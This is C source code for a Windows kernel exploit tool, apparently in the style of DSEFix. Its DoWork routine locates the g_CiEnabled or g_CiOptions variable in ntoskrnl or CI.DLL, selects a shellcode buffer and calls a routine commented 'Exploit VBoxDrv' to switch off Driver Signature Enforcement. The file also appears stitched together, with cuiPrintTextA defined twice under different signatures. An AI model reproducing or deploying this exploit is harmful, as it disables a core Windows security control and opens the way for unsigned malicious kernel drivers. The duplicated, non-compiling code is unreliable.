/*
* cuiPrintTextA
*
* Purpose:
*
* Output text to the console or file.
* ANSI version.
*
*/
VOID cuiPrintTextA(
_In_ LPSTR lpText,
_In_ BOOL UseReturn
)
{
SIZE_T consoleIO;
DWORD bytesIO;
LPSTR Buffer;
if (lpText == NULL)
return;
consoleIO = _strlen_a(lpText);
if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4))
return;
consoleIO = 5 + consoleIO;
Buffer = (LPSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, consoleIO);
if (Buffer) {
_strcpy_a(Buffer, lpText);
if (UseReturn) _strcat_a(Buffer, "\r\n");
consoleIO = _strlen_a(Buffer);
if (g_ConsoleOutput != FALSE) {
WriteConsoleA(g_ConOut, Buffer, (DWORD)consoleIO, &bytesIO, NULL);
}
else {
WriteFile(g_ConOut, Buffer, (DWORD)consoleIO, &bytesIO, NULL);
}
HeapFree(GetProcessHeap(), 0, Buffer);
}
}
VOID ShowServiceMessage(
LPSTR lpMsg
)
{
CHAR szBuffer[MAX_PATH * 2];
//
// Validate input parameter.
//
if (lpMsg == NULL) {
return;
}
if (_strlen_a(lpMsg) > MAX_PATH) {
return;
}
//
// Combine and output ODS message.
//
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
_strcpy_a(szBuffer, "[DF] ");
_strcat_a(szBuffer, lpMsg);
OutputDebugStringA(szBuffer);
}
/*
* cuiPrintTextA
*
* Purpose:
*
* Output text to the console or file.
*
* ANSI variant
*
*/
VOID cuiPrintTextA(
_In_ HANDLE hOutConsole,
_In_ LPSTR lpText,
_In_ BOOL ConsoleOutputEnabled,
_In_ BOOL UseReturn
)
{
SIZE_T consoleIO;
DWORD bytesIO;
LPSTR Buffer;
if (lpText == NULL)
return;
consoleIO = _strlen_a(lpText);
if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4))
return;
consoleIO = consoleIO * sizeof(CHAR) + 4 + sizeof(UNICODE_NULL);
Buffer = (LPSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, consoleIO);
if (Buffer) {
_strcpy_a(Buffer, lpText);
if (UseReturn) _strcat_a(Buffer, "\r\n");
consoleIO = _strlen_a(Buffer);
if (ConsoleOutputEnabled != FALSE) {
WriteConsoleA(hOutConsole, Buffer, (DWORD)consoleIO, &bytesIO, NULL);
}
else {
WriteFile(hOutConsole, Buffer, (DWORD)(consoleIO * sizeof(CHAR)), &bytesIO, NULL);
}
HeapFree(GetProcessHeap(), 0, Buffer);
}
}
BOOL DoWork(
HANDLE hDevice,
BOOL bDisable
)
{
BOOL bRes = FALSE, bFound, cond;
ULONG rl = 0, c;
LONG rel = 0;
PVOID scBuffer = NULL, MappedKernel = NULL;
ULONG_PTR KernelBase = 0L;
SIZE_T ModuleSize;
PLIST_ENTRY Head, Next;
PLDR_DATA_TABLE_ENTRY Entry;
PRTL_PROCESS_MODULES miSpace;
CHAR KernelFullPathName[BUFFER_SIZE];
CHAR szOdsText[BUFFER_SIZE];
cond = FALSE;
do {
//
// Enumerate loaded drivers.
//
miSpace = supGetSystemInfo(SystemModuleInformation);
if (miSpace == NULL) {
break;
}
if (miSpace->NumberOfModules == 0) {
break;
}
RtlSecureZeroMemory(KernelFullPathName, sizeof(KernelFullPathName));
rl = GetSystemDirectoryA(KernelFullPathName, MAX_PATH);
if (rl == 0) {
break;
}
KernelFullPathName[rl] = (CHAR)'\\';
_strcpy_a(szOdsText, "[DF] Windows v");
ultostr_a(osv.dwMajorVersion, _strend_a(szOdsText));
_strcat_a(szOdsText, ".");
ultostr_a(osv.dwMinorVersion, _strend_a(szOdsText));
OutputDebugStringA(szOdsText);
//
// For vista/7 find ntoskrnl.exe
//
bFound = FALSE;
if (osv.dwMajorVersion == 6) {
if (osv.dwMinorVersion < 2) {
_strcpy_a(&KernelFullPathName[rl + 1],
(const char*)&miSpace->Modules[0].FullPathName[miSpace->Modules[0].OffsetToFileName]);
KernelBase = (ULONG_PTR)miSpace->Modules[0].ImageBase;
bFound = TRUE;
}
}
//
// For 8+, 10 find CI.DLL
//
if (bFound == FALSE) {
_strcpy_a(&KernelFullPathName[rl + 1], CI_DLL);
for (c = 0; c < miSpace->NumberOfModules; c++)
if (_strcmpi_a((const char *)&miSpace->Modules[c].FullPathName[miSpace->Modules[c].OffsetToFileName],
CI_DLL) == 0)
{
KernelBase = (ULONG_PTR)miSpace->Modules[c].ImageBase;
break;
}
}
HeapFree(GetProcessHeap(), 0, miSpace);
miSpace = NULL;
_strcpy_a(szOdsText, "[DF] Target module ");
_strcat_a(szOdsText, KernelFullPathName);
OutputDebugStringA(szOdsText);
_strcpy_a(szOdsText, "[DF] Module base ");
u64tohex_a(KernelBase, _strend_a(szOdsText));
OutputDebugStringA(szOdsText);
//
// Map ntoskrnl/CI.DLL in our address space.
//
MappedKernel = LoadLibraryExA(KernelFullPathName, NULL, DONT_RESOLVE_DLL_REFERENCES);
if (MappedKernel == NULL) {
break;
}
//
// Check if we are in NT6.x branch
//
if (osv.dwMajorVersion == 6) {
//
// Find g_CiEnabled Vista, Seven
//
if (osv.dwMinorVersion < 2) {
//
// Query module size via PEB loader for bruteforce.
//
ModuleSize = 0;
EnterCriticalSection((PRTL_CRITICAL_SECTION)NtCurrentPeb()->LoaderLock);
Head = &NtCurrentPeb()->Ldr->InLoadOrderModuleList;
Next = Head->Flink;
while (Next != Head) {
Entry = CONTAINING_RECORD(Next, LDR_DATA_TABLE_ENTRY, InLoadOrderLinks);
if (Entry->DllBase == MappedKernel) {
ModuleSize = Entry->SizeOfImage;
break;
}
Next = Next->Flink;
}
LeaveCriticalSection((PRTL_CRITICAL_SECTION)NtCurrentPeb()->LoaderLock);
//
// Module not found, abort.
//
if (ModuleSize == 0) {
break;
}
rel = dsfQueryCiEnabled(&KernelBase, MappedKernel, (DWORD)ModuleSize);
}
else {
//
// Find g_CiOptions w8+
//
rel = dsfQueryCiOptions(&KernelBase, MappedKernel);
}
}
else {
//
// Otherwise > NT6.x, find g_CiOptions 10+
//
rel = dsfQueryCiOptions(&KernelBase, MappedKernel);
}
if (rel == 0)
break;
_strcpy_a(szOdsText, "[DF] Apply patch to address ");
u64tohex_a(KernelBase, _strend_a(szOdsText));
OutputDebugStringA(szOdsText);
//
// Select proper shellcode buffer
//
if (bDisable) {
scBuffer = (PVOID)scDisable;
}
else {
//
//Shellcode for for 8/10+
//
scBuffer = (PVOID)scEnable8Plus;
if (osv.dwMajorVersion == 6) {
//
//Shellcode for vista, 7
//
if (osv.dwMinorVersion < 2) {
scBuffer = (PVOID)scEnableVista7;
}
}
}
//
// Exploit VBoxDrv.
//
bRes = ControlDSE(hDevice, KernelBase, scBuffer);
} while (cond);
if (MappedKernel != NULL) {
FreeLibrary(MappedKernel);
}
if (miSpace != NULL) {
HeapFree(GetProcessHeap(), 0, miSpace);
}
return bRes;
}
